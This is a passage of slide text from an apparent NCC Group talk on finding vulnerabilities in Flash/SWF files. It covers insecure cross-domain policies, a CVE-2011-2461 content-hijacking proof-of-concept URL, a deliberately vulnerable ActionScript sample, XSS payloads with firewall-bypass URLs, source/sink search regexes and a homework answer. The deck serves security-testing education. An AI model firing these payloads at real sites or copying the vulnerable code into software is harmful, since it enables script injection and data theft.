  • 9. Insecure crossdomain.xml ♦ Least restrictive policy: ♦ “crossdomain.xml” instead of “clientaccesspolicy.xml” for Silverlight:  The most secure one is insecure! © NCC Group 9 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross- domain-policy.dtd"> <cross-domain-policy> <site-control permitted-cross-domain-policies="all"/> <allow-access-from domain="*" secure="false"/> <allow-http-request-headers-from domain="*" headers="*" secure="false"/> </cross-domain-policy> <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross- domain-policy.dtd"> <cross-domain-policy> <allow-access-from domain="*" headers="SOAPAction" secure="true"> </cross-domain-policy>
  • 10. Content Hijacking PoCTool ♦ Cross-Site Content Hijacking (XSCH) PoC:  https://github.com/nccgroup/CrossSiteContentHijacking  E.g.: https://query.yahooapis.com/crossdomain.xml © NCC Group 10
  • 11. CVE-2011-2461 -The Dead is Alive! ♦ Flex SDK issue (between 3.x and 4.5.1) ♦ A new input to load external SWF files ♦ Attacks:  Same-Origin Request Forgery  Cross-Site Content Hijacking ♦ Found by Mauro Gentile (@sneak_) & Luca Carettoni © NCC Group 11
  • 12. Finding CVE-2011-2461 ♦ ParrotNG to the rescue!  with Burp Suite extension (passive scan)!  Make sure it is working properly -> Important ;-)  Only scan .swf extensions!  Can search a folder ♦ Decompile & Search:  In “mx.modules.ModuleManager”  Patched version may have “&& false == true” ♦ Cross-SiteContent Hijacking (XSCH) PoC :  https://github.com/nccgroup/CrossSiteContentHijacking © NCC Group 12 Security.sandboxType == Security.REMOTE)
  • 13. CVE-2011-2461 Exploitation PoC ♦ “wonderwheel7.swf” was hosted on Google.com originally ♦ ParrotNG detected the issue: ♦ e.g: Hijacking contents from “0me.me” by “15.rs”:  https://15.rs/ContentHijacking/ContentHijackingLoader.html?objfile=https://0me. me/demo/cve-2011-2461/wonderwheel7.swf&objtype=cve-2011- 2461&target=https://0me.me/secret.txt&logmode=result&isauto=1 © NCC Group 13
  • 14. Important: Do Not Reinvent theWheel! ♦ Search for known vulnerabilities  e.g.: https://web.archive.org/web/20130730223443/http://web.appsec.ws/FlashExploit Database.php ♦ Search their issue tracker for security issues ♦ Old exploits may still be valid with a few changes! © NCC Group 14
  • 15. AutomatedTesting Listed in OWASP Flash Security Project: ♦ FlashDiggity  Decompile -> Search using RegEx  Extractable Rules: http://www.bishopfox.com/dictionaries/Flash%20Regexes.txt  Had problems with AS3 during test ♦ HP SWFScan (Part of HP WebInspect)  DecompileAS2 & 3 -> Search using RegEx  Has module exclusion rules  Stand-alone is old otherwise commercial ♦ HP Fortify  Scan AS3, Flex3 & 4 using source code (not SWF)  Commercial © NCC Group 15
  • 16. Updated SWFIntruder + ♦ Updated SWFIntruder:  Dirty fix for the original SWFIntruder  Uses several payloads for each input parameter  Can detect most of AS2 FlashVars  FlashVars should be declared for AS3  Good to find XSS without user interaction  Runs in a browser – can be slow  Can be extended by you! https://github.com/irsdl/updated-SWFIntruder ♦ FlashBang  Runs in a browser  Based on Mozilla's Shumway  Easy way to identify FlashVars (just has some bugs!)  https://github.com/cure53/flashbang © NCC Group 16
  • 17. Try it on! Homework! ♦ http://0me.me/swfintruder/testSWF/  http://0me.me/swfintruder/testSWF/clickTagSample.swf  http://0me.me/swfintruder/testSWF/fileuploader.swf  http://0me.me/swfintruder/testSWF/Vulnerable.swf © NCC Group 17
  • 18. ManualTesting ♦ Preparing testing environment ♦ CompilingActionScript files ♦ Decompiling SWF files ♦ Finding inputs (sources) ♦ Finding usage of dangerous functions (sinks) ♦ Reviewing the logic, finding sensitive strings, reversing, etc. © NCC Group 18
  • 19. Preparing the Environment (Windows) ♦ Download the Flash debugger version:  https://www.adobe.com/support/flashplayer/downloads.html Windows: ♦ Modify the “mm.cfg” file in %userprofile%  e.g. c:usersmyusermm.cfg  Default log file location inWindows (policy file is there too): © NCC Group 19 ErrorReportingEnable=1 TraceOutputFileEnable=1 MaxWarnings=50 PolicyFileLog=1 PolicyFileLogAppend=1 # AS3Trace=1 # To see more! %userprofile%AppDataRoamingMacromediaFlash PlayerLogsflashlog.txt
  • 20. Compiling HelloXSSWorld.as ♦ Free recommended IDEs:  FDT (similar to Eclipse) (preferred for simpler projects)  FlashDevelop (includes a powerful runtime debugger) ♦ + Flex SDK and Java ♦ Code sample (vulnerable to open redirect and XSS): © NCC Group 20 package { import flash.net.navigateToURL; import flash.net.URLRequest; import flash.display.Sprite; public class HelloFlashWorld extends Sprite { // User input: HelloFlashWorld.swf?target=foo private var url : String = root.loaderInfo.parameters.target; public function HelloFlashWorld() { var request : URLRequest = new URLRequest(url); try { // redirect to the target URL navigateToURL(request); } catch (e : Error) { // handle error here } } } }
  • 21. Decompiling a SWF File ♦ Recommended decompiler: JPEXS Free Flash Decompiler  Easy to use UI  Can edit SWF files  Occasional updates  Another Java based tool! can be slow and it might crash but still good! https://www.free-decompiler.com/flash/ https://github.com/jindrapetrik/jpexs-decompiler © NCC Group 21
  • 22. Decompiled, NowWhat? ♦ AS1/2 or AS3?  http://dev.sitedaniel.com/swfinfo/swfinfo.swf - added to Updated SWF Intruder ♦ Find input parameters (sources)  Find their usage ♦ Find interesting/sensitive functions (sinks)  Check their inputs ♦ Identify insecure policies  Any interesting behaviour? ♦ Identify sensitive data or hidden URLs  Can lead to server-side issues (more serious issues) ♦ Identify storage and logging issues  Cookies and logs © NCC Group 22
  • 23. Input Parameters - Sources ♦ Finding a “source”:  Look at the HTML page (DOM viewer)  Find similar inputs based on a known input parameter  AS3 (Variables need to be defined):  Search for: “root”, “loaderInfo”, “parameters”  e.g.: root.loaderInfo.parameters.inputName  AS2 (Variables can be undefined):  Search for: “_root”, “_global”, “_level0”  Any undefined variable! Use Flash debugger log file! © NCC Group 23 .(root|loaderInfo|parameters)[^w]|[^w](root|loaderInfo|parameters). .(_root|_global|_level0)[^w]|[^w](_root|_global|_level0). Warning: Reference to undeclared variable, 'inputName'
  • 24. Sinks ♦ Sinks - find usage of sensitive functions  Can run JavaScript:  AS3: “ExternalInterface.call”, “navigateToURL”  AS2: “getURL”, “fscommand”  “.htmlText”  Can load objects, or send/receive/store data:  “XMLLoader”, “AMFService”, “SWFLoader”, “loadVariables”, “loadMovie”, “loadMovieNum”, “LoadVars.load”, “LoadVars.send”, “NetStream.play”, “getDefinition”, “getDefinition”, “FScrollPane.loadScrollContent”, “XML.load”, “Sound.loadSound”, “NetStream.play”, “URLRequest”, “URLLoader”, “URLStream”, “LocalConnection”, “SharedObject”  Can run Flash functions from JavaScript:  “ExternalInterface.addCallback” (AS3), “.watch” (AS2)  Important with insecure “Security.allowDomain” ♦ No sensitive function = Less likely to find a good vulnerability © NCC Group 24
  • 25. Source <-> Sink Flow! ♦ Tainted source --> … --> sink! ♦ Sink <-- … <--Tainted source! ♦ Any validation?  What is allowed?  Is it good enough? ♦ Any logic?  Some inputs should be set for something to happen?  Role of any provided external file/URL © NCC Group 25
  • 26. Insecure Policies in SWF Files ♦ Search for “allowDomain” and “allowInsecureDomain” ♦ Security.allowDomain: Cross-domain communication  SWF can be scripted by another SWF file on another domain  HTML (JavaScript) from another domain can communicate with SWF ♦ Security.allowInsecureDomain: HTTP to HTTPS communication  HTTPS communication to HTTP is fine ♦ LocalConnection’s Security.allowDomain  SWF/AIR can communicate with another SWF/AIR Not an issue if there is no interesting functionality! © NCC Group 26
  • 27. Sensitive Data / Hidden URLs / Gems! ♦ Think like a forensic analyst! Search for:  URLs  Emails  Secret keys and passwords  Database information  Etc. ♦ FlashDiggity rules are good:  http://www.bishopfox.com/dictionaries/Flash%20Regexes.txt © NCC Group 27
  • 28. Sensitive Data in Storage! ♦ “SharedObjects” for Flash Cookies!  Can even store binary ♦ “trace” function for logging in debug mode.  Can make the debugging easier  Sensitive data in log files when debugger version is used © NCC Group 28
  • 29. Find More! Be creative! ♦ Always look at the FlashVars parameter names  Anything called “onload”, “onclick”, or “redirect”? ♦ Does it load another file when you open it? Find it, abuse it! ♦ Does it accept external configuration files?  Find a valid config file and manipulate it  Example: XSS issue in FlowPlayer: https://github.com/flowplayer/flash/issues/263 © NCC Group 29
  • 30. “ExternalInterface.call” XSS Confusion! ♦ Accept JS function name and its parameters ♦ Both can lead to XSS ♦ The first parameter can be a simple JavaScript code (name of JS function) ♦ The next parameter (argument) is escaped:  " turns into "  all good!  doesn't turn into  too bad! So " can be used to run a JS code. e.g. "))-alert('XSS')}catch(e){}// See http://mihai.bazon.net/blog/externalinterface-is-unreliable ♦ Debuggable using browsers’ console – cause an error:  xxx"'(){}"'(){}'"(){}xxx © NCC Group 30
  • 31. Bypassing Client Side Protections ♦ Protections on the client side only make it more user friendly  Not good for security! ♦ Find the responsible function in the source code  Understand how it works, find the credentials, and bypass it!  Change the code and save it to bypass the protections © NCC Group 31
  • 32. More Issues… ♦ Identify and review the sensitive functions  Such as login or encryption functions ♦ Flash files can contain unused/commented server side code and information ♦ Identify requests that it sends to the server  Can lead to finding broken access controls on the server side ♦ Examples:  Testing an online game?  Can you go to the next level without playing?  Does it use encryption?  Are there any keys stored in the application? © NCC Group 32
  • 33. FlashVarsTips! ♦ Passing parameters in URL:  File.swf?param1=value1&p2=v2 ♦ Removes invalid encoding  param1=value1 -> pa%Xram1=val%Yue1  param1=value1 -> pa%=ram1=val%#ue1  param1=value1 -> pa%AXram1=val%B#ue1 ♦ Sending parameters after “#” is dead? Nope!  File.swf?%#param1=value1&p2=v2 ♦ In redirection, %7f-%FF converts to “?” ♦ BOM (byte-order-mark) “%EF%BB%BF” = a SPACE char! ♦ Flash in Firefox may not like %00 © NCC Group 33
  • 34. Examples ♦ Bypassing firewalls – was detecting “domid=”:  https://example.com/foobar/ScrollLine2D.swf?%#domid=%22))}catch(e){};a lert(%27External%20Interface%20XSS%20from:%20%27%2bdocument.do main)//&registerwithjs=1 ♦ Bypassing an in-app protection – didn’t like inputs from GET:  /flashmediaelement.swf?jsinitfunctio%gn=alert`1` © NCC Group 34 pos = root.loaderInfo.url.indexOf('?'); if (pos !== -1) { query = parseStr(root.loaderInfo.url.substr(pos + 1)); for (var key:String in params) { if (query.hasOwnProperty(trim(key))) { delete params[key]; } } }
  • 35. Demo – FindingVulnerabilities! ♦ clickTagSample.swf  ActionScript2 ♦ vulnerable.swf  ActionSctipt2 ♦ Homework: ♦ fileuploader.swf  ActionScript3 ♦ Answer (in white colour): ?flashButton=:"))-alert('XSS')}catch(e){}//; ♦ You are ready with more practice! © NCC Group 35
  • 36. Used RegExes in Demo AS3 Inputs: .(root|loaderInfo|parameters)[^w]|[^w](root|loaderInfo|parameters). AS2 Inputs (remember undefined inputs – follow the sinks): .(_root|_global|_level0)[^w]|[^w](_root|_global|_level0). XSS: (getURL|ExternalInterface.call|navigateToURL|.htmlText) Sensitive functions: (XMLLoader|AMFService|SWFLoader|loadVariables|loadMovie|loadMovieNum|Loa dVars.load|LoadVars.send|NetStream.play|getDefinition|getDefinition|FScrollPa ne.loadScrollContent|XML.load|Sound.loadSound|NetStream.play|URLRequest| URLLoader|URLStream|LocalConnection|SharedObject) Interesting keywords: (allowInsecureDomain|allowDomain|ExternalInterface|load|xml|sql|url|flashvar|pa ss|TextField|encr) © NCC Group 36
  • 37. Final Notes ♦ Search in your proxy logs for “SWF” files! ♦ JS libraries and plugins can contain Flash files ♦ Can be slow – don’t panic! Plan ahead! ♦ Review the API references for any security-related functions:  AS2: http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/2/  AS3: http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/ ♦ The following resource is also recommended for code review:  http://www.hpenterprisesecurity.com/vulncat/en/vulncat/index.html ♦ Flash files can send requests to their server during testing! ♦ Downloading random Flash files is dangerous but fun  We all know why! © NCC Group 37
  • 38. Thank you! Questions? Really?Why?! ;) ♦ Sample files in: https://github.com/irsdl/Flash-Files-Vulnerability-Database © NCC Group 38
  • 39. References & Further Reading - 1 ♦ Securely deploying cross-domain policy files  http://blogs.adobe.com/security/2009/11/securely_deploying_cross-domai.html ♦ Related to Flash policy file  http://www.adobe.com/devnet/adobe-media-server/articles/cross-domain-xml-for- streaming.html ♦ Security Domains,Application Domains, and More in ActionScript 3.0  http://www.senocular.com/flash/tutorials/contentdomains/ ♦ Penetration testers guide  http://www.ivizsecurity.com/blog/web-application-security/testing-flash-applications-pen- tester-guide/ ♦ ExploitingCVE-2011-2461 on google.com  http://blog.mindedsecurity.com/2015/03/exploiting-cve-2011-2461-on-googlecom.html ♦ AS3 hidden treasure in the mm.cfg file  https://jpauclair.net/2010/02/10/mmcfg-treasure/ © NCC Group 39
  • 40. References & Further Reading - 2 ♦ ParrotNG project to find CVE-2011-2461 vulnerable files  https://github.com/ikkisoft/ParrotNG ♦ Testing for Cross site flashing  https://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OTG-CLIENT-008) ♦ Blinded by Flash:Widespread Security Risks Flash Developers Don’t See  https://www.blackhat.com/presentations/bh-dc-09/Jagdale/BlackHat-DC-09-Jagdale- Blinded-by-Flash.pdf ♦ SWF INFO :WIDTH, HEIGHT, SWFVERSION,ACTIONSCRIPTVERSION, FRAMERATE  http://blog.sitedaniel.com/2009/11/swf-info-width-height-swf-version-actionscript-version- framerate/ ♦ Creating more secure SWF web applications  http://www.adobe.com/devnet/flashplayer/articles/secure_swf_apps.html ♦ OWASP Flash Security Project  https://www.owasp.org/index.php/Category:OWASP_Flash_Security_Project © NCC Group 40
  • 41. References & Further Reading - 3 ♦ Same Origin Method Execution (SOME)  http://www.benhayak.com/2015/06/same-origin-method-execution-some.html ♦ WordPress SOME bug in plupload.flash.swf  https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e ♦ Catch-up on Flash XSS exploitation  https://soroush.secproject.com/blog/2013/10/catch-up-on-flash-xss-exploitation-bypassing- the-guardians-part-1/  https://soroush.secproject.com/blog/2013/10/catch-up-on-flash-xss-exploitation-part-2- navigatetourl-and-jar-protocol/  https://soroush.secproject.com/blog/2014/01/catch-up-on-flash-xss-exploitation-part-3-xss- by-embedding-a-flash-file/ © NCC Group 41